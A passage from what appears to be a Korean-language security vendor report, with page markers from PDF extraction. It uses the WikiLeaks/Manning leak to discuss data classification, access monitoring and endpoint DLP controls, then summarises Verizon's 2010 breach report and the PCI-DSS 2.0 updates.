주의가 결여된 신호 분석... 등 공격하기에 완벽한 조건을 갖추었습니다." 41 < >

43 "미국 근무지가 있는 곳에는 어디에나 공개할 만한 외교적 스캔들이 있습니다."라고 Manning은 말합니다. "바로 개방 외교입니다. CSV 형식으로 전세계를 무정부 상태로 만든 거죠. 전세계를 대상으로 하는 놀랄만한 Climategate입니다. 너무 멋져서 소름이 돋을 정도입니다." "힐러리 클린턴과 전 세계 수천 명의 외교관들이 내일 아침에 일어나서 기밀로 분류된 외교 정책 저장소의 전체 내용이 대중에게 검색 가능한 형식으로 제공된다는 사실을 알게 되면 심장마비에 걸릴 것입니다."라고 Manning은 말합니다. PFC Bradley Manning은 2010년 5월에 체포되었습니다. 몇 개월 후에 위키리크스에서 국무부의 기밀 문서를 노출하여 사건이 커졌습니다. 온라인 결제 사이트가 자금줄을 막기 위해 위키리크스에 대한 결제를 차단했습니다. 이 때문에 봇넷이 이러한 결제 사이트를 공격하고 기밀 정보를 전세계 주요 뉴스 사이트는 물론이고 미러 사이트에 배포하도록 맬웨어를 자발적으로 다운로드하는 운동이 일어났습니다. 데이터 거버넌스의 몇 가지 교훈 아무리 안 좋은 상황에서도 긍정적인 측면은 있다고 위키리크스가 네트워크 환경의 체계적 데이터 관리 개념에 대한 경각심을 일깨워 준 것은 그나마도 교훈이라고 할 수 있습니다. 이 사건으로부터 얻을 수 있는 교훈에 대해서는 위키리크스 논쟁16으로 치열하던 워싱턴에서 며칠 후에 Gary Warner가 자신의 블로그에 잘 정리해 두었습니다. 정보 분류, 액세스 제어 및 모니터링은 가장 중요한 핵심 영역입니다. 첫 번째 교훈은 분류와 범주화입니다. 데이터를 다양한 수준의 보안 및 중요도로 분류하는 외에도 항목별로 범주화해야 합니다. 블루코트는 게시물 9/11에서 전세계의 보안 전문가들에게 광범위한 정보에 액세스할 수 있는 권한을 부여하여 다른 공격을 피할 수 있지만 이로 인한 영향이 적지 않습니다. 보안 분석가는 일급기밀/SCI 정보를 얻을 수 있지만 정보 범주도 체계적 데이터 관리와 매우 밀접한 관련이 있습니다. Gary의 병원 비유는 매우 적합합니다. 의사는 의료 목적상 환자 정보에 대한 최상위 수준의 액세스 권한을 가질 수 있지만, 결제 정보, 신용카드 번호 및 신용 기록에 액세스할 필요가 있을까요? 이는 체계적 데이터 관리 중 액세스 모니터링과 관련한 문제이며 많은 규정에서는 이러한 분류와 범주 사이의 경계를 명확하게 정의하고 있습니다. 42 < >

44 다음으로 얻을 수 있는 교훈은 데이터 흐름의 양입니다. 한 사람이 작업 범위 내의 데이터 범주에 대해 반복적으로 요청하는 것은 이해가 가지만 해당 영역을 벗어난 데이터 범주에 대해 반복적으로 요청하는 것은 반드시 모니터링해 보아야 합니다. 직원이 가끔씩 자신의 범위를 벗어난 요청을 하는 경우 경고할 필요는 없지만, 실제로 경고가 필요할 수도 있습니다. 결과적으로 데이터를 범주화하고 각 범주에 대한 분류 수준을 표로 만들고 각 셸 내에 범주에 대한 타당한 요청 볼륨과 구체적 분류 수준을 표시해야 합니다. 그렇다면 보안 IT 산업과 관련하여 "PFC Bradley Manning의 의심스런 상황을 예방할 수 있었을까?"라는 중요한 의문이 듭니다. Gary Warner의 교훈에 따르면 보안 수준과 요청 볼륨을 적용하여 데이터를 범주화하면 이러한 적신호를 발견할 수 있었을까요? 이 경우 방위 의무와 조국에게 맹세한 군인이었지만 일반적인 사무 근로자, 의료 종사자, 소매 종사자 또는 IT 직원의 경우 기밀 데이터에 대해서 어떻게 처리할까요? DLP 공급업체는 위키리크스 상황을 빠르게 활용하여 자신들의 솔루션에 대해 토론했습니다. 블루코트 솔루션을 포함한 엔드포인트 DLP 에이전트는 관리자가 설치하여 결과를 모니터링할 경우 다음과 같은 유형의 제어와 경고가 발생합니다. -> 모니터링 및 감사를 통해 대시보드 및 사건 보고 내용을 휴대용 미디어에 모두 복사 -> Active Directory 사용자/그룹에 기반을 둔 휴대용 미디어에 대한 복사를 차단 -> 컴퓨터/컴퓨터 도메인에 기반을 둔 휴대용 미디어에 대한 복사를 차단 CD/DVD 또는 USB)에 기반을 둔 휴대용 미디어에 대한 복사를 차단 -> 콘텐츠에 기반을 둔 휴대용 미디어에 대한 복사를 차단 -> 모든 차단 정책은 담당 관리자에게 알림 경고 위키리크스 사건은 체계적 데이터 관리 기술과 더 큰 과제에 대한 DLP 논쟁을 일으켰습니다. 블루코트는 다년 간의 웹 필터링을 통해 자동 예방은 사용자의 동작을 변경시키고 모니터링은 사용자 동작에 거의 영향을 주지 않는다는 사실을 알게 되었습니다. 액세스가 차단되면 사용자의 행동이 달라집니다. 43 < >

45 성인 콘텐츠와 게임은 강력한 유혹입니다. 직원들에게 그들의 동작이 기록되고 향후에 고용 관계에 위험이 초래될 수 있다고 말해주어도 마찬가지입니다. 그렇게 말해주어도 하루 내에 성인 웹 사이트를 다시 클릭하게 됩니다. 잘 보이지 않도록 사무실 복도에서 떨어진 위치에 설치된 모니터에 한 직원이 찍힌 사건이 있었습니다. 겨울 동안 바깥이 어두워지면서 모니터 이미지가 직원 뒤에 있는 사무실 창문에 반사되는 점이 문제가 되었습니다. 모범 사례 연구에 따르면 모니터링은 정책을 성숙시키고 예외를 작성하며 추세를 파악하는 데 있어서 좋은 단계가 된다고 합니다. 하지만 결국 자동 예방은 결과를 수반하게 됩니다. 사건 보고서 및 트렌드 대부분의 손상된 데이터 기록에 대한 책임이 있는 해킹과 맬웨어를 차단하는 웹 방어 계층이 효율적인 데이터 유출 방지 솔루션의 기반이 됩니다. 데이터 유출 사건에 대한 미국 대통령 경호실의 입력 내용이 포함된 2010년의 DBIR(Verizon Data Breach Incident Report)을 살펴보면 더 폭넓게 이해할 수 있습니다 년에 사고 수는 감소하는 추세지만 여전히 사고가 발생한 서버와 애플리케이션의 98% 이상에서 레코드 손실이 나타났습니다. 전체 보고서는 6년에 걸쳐 작성되었으며 9억 건 이상의 손상된 레코드와 관련하여 900건 이상의 침해 행위를 다루고 있습니다. 침해 유형과 침해를 당한 레코드 비율의 상관관계는 시사하는 바가 큽니다. 해킹과 맬웨어가 각각 사고의 40%와 38%로 관련되어 있지만 손상된 레코드의 94% 이상이 이로 인한 것입니다. 반대로 잘못된 사용은 사고의 48%로 관련되어 침해 유형 중 1위를 차지했지만 레코드 손상은 3%에 불과했습니다. 사회적/ 물리적 침해 유형도 레코드 손상률이 3% 미만이었습니다. Malware Hacking Social Misuse Physical Error Environmental 2% 0% 0% / 0% 15% 1% 28% 3% 38% 94% 40% 96% 48% 3% Verizon 2010 DBIR, (사고 백분율/레코드 백분율) 44 < >

46 대통령 경호실 통계를 포함하여 이번 연도에는 내부 관계자의 사건이 증가했습니다. 전체 침해 사고의 69%가 외부 리소스에 의해 발생했습니다. 놀랍게도 피해자의 87%가 로그 파일에 증거가 있음에도 불구하고 알아차리지 못했습니다. 또한 침해 사고의 85%는 크게 문제가 되지 않았습니다. 대부분의 침해 사고는 기본적인 보안 습관만으로도 피할 수 있는 것으로 간주되며, 시행하기 위해 많은 노력과 비용을 들인 것으로 간주되는 침해 사고는 4%에 불과했습니다. 지난 해 발생한 데이터 도난 사고의 85%는 범죄 조직에서 저지른 것입니다. 그렇다면 "기본적인 보안 습관이란 무엇인가?"라는 질문을 할 수 있습니다. 보고서는 침해가 발생했을 때 로그를 분석하고 나무가 아니라 숲을 보는 방법을 선택합니다. 예를 들어 공격자가 숨어 있기 위해 로그 기능을 해제했기 때문에 로그 크기가 매우 작거나, 반대로 로그 활동이 크게 증가할 수 있습니다. 한 번은 사고 후 로그 볼륨이 500% 이상 증가한 적도 있습니다. SQL 삽입 공격과 기타 공격이 발생하면 각 로그 레코드의 크기가 증가하므로 로그 레코드 크기는 중요합니다. 따라서 로깅의 급격한 변화를 정기적으로 모니터링해야 합니다. 여기서 얻을 수 있는 교훈은 DLP에 양면성이 있다는 사실입니다. 한 가지는 직원에 대한 분류, 모니터링 및 예방을 통한 체계적 데이터 관리입니다. 다른 하나는 위협 방어 계층을 통해 외부 맬웨어와 해킹을 차단하는 것입니다. 맬웨어와 관련된 사고의 상위 세 가지 기능은 백도어, 키로거 및 스파이웨어, 외부 사이트/엔터티에 대한 데이터 전송 또는 콜-홈입니다. DLP 솔루션을 설치한 다음 단순 방어 기능과 1세대 URL 필터링을 사용하는 것은 곳간 문을 활짝 열어두는 것과 같습니다. 웹에는 사람을 유혹하는 많은 미끼가 있고, 동적 링크는 드라이브 바이(drive-by) 설치를 유도하며, 새로운 공격이 발생한 후 처음 몇 시간 이내에 바이러스 백신이 공격을 차단할 가능성이 매우 낮다는 사실을 잘 알고 있습니다. 강력한 웹 방어는 면밀한 DLP 설치의 기본입니다. Verizon DBIR 2010 보고서 분석에 따르면 PCI-DSS 표준 관련 피해자의 79% 가 침해 사고가 발생하기 이전에 표준을 준수하지 않은 것으로 밝혀졌습니다. PCI v2.018은 2011년 1월 1일에 발효되었으며 PCI-DSS(Payment Card Industry Data Security Standard) 및 PA-DSS(Payment Application Data Security Standard)에 비해 12가지 항목이 변경되었습니다. 변경 항목은 분류, 일반 지침 및 진화하는 요구 사항이라는 세 가지 일반 범주에 속하며 주목할 만한 주요 변경 사항은 없습니다. 주요 업데이트로는 PCI-DSS 평가 이전에 카드 소유자 데이터가 있는 위치를 45 < >

47 확인하기 위한 조사 습관의 강화를 들 수 있습니다. 이를 통해 카드 소유자 데이터의 지문을 사용하여 어디에서든 쉽게 찾을 수 있도록 하여 DLP 검색 프로젝트가 기대한 만큼 성장할 수 있습니다. 카드 번호로 결제하는 방식의 단순 DLP 솔루션으로는 충분하지 않습니다. 실제 데이터 지문을 사용하면 보다 정확하게 표준을 준수할 수 있습니다. 중앙 집중식 로깅 및 효율적인 로그 관리가 PCI 2.0 업데이트에 포함되었습니다. 이는 로그 볼륨 또는 레코드 길이의 급격한 크기 변화에 대한 로그 모니터링과 관련한 위의 Verizon 권고에 부합합니다. 또한 위험 기반 보안 취약성 관리 방법과 보안 취약성에 대한 비즈니스 수준의 허용 오차가 포함되었습니다. 이 업데이트는 PCI-DSS와 PA-DSS간에 더 강한 긴밀함을 요구합니다. 카드 소유자 정보가 사이버 범죄에 매우 중요하고 맬웨어와 해킹이 보안 침해와 손상된 레코드의 주요 원인임을 감안할 때 강력한 웹 방어는 오늘날의 미끼 및 동적 웹 링크에 대한 당연한 요구 사항입니다. 이전의 방화벽, 바이러스 백신 및 단순 URL 필터링만으로는 데이터와 리소스를 보호하는 데 충분하지 않습니다. 46 < >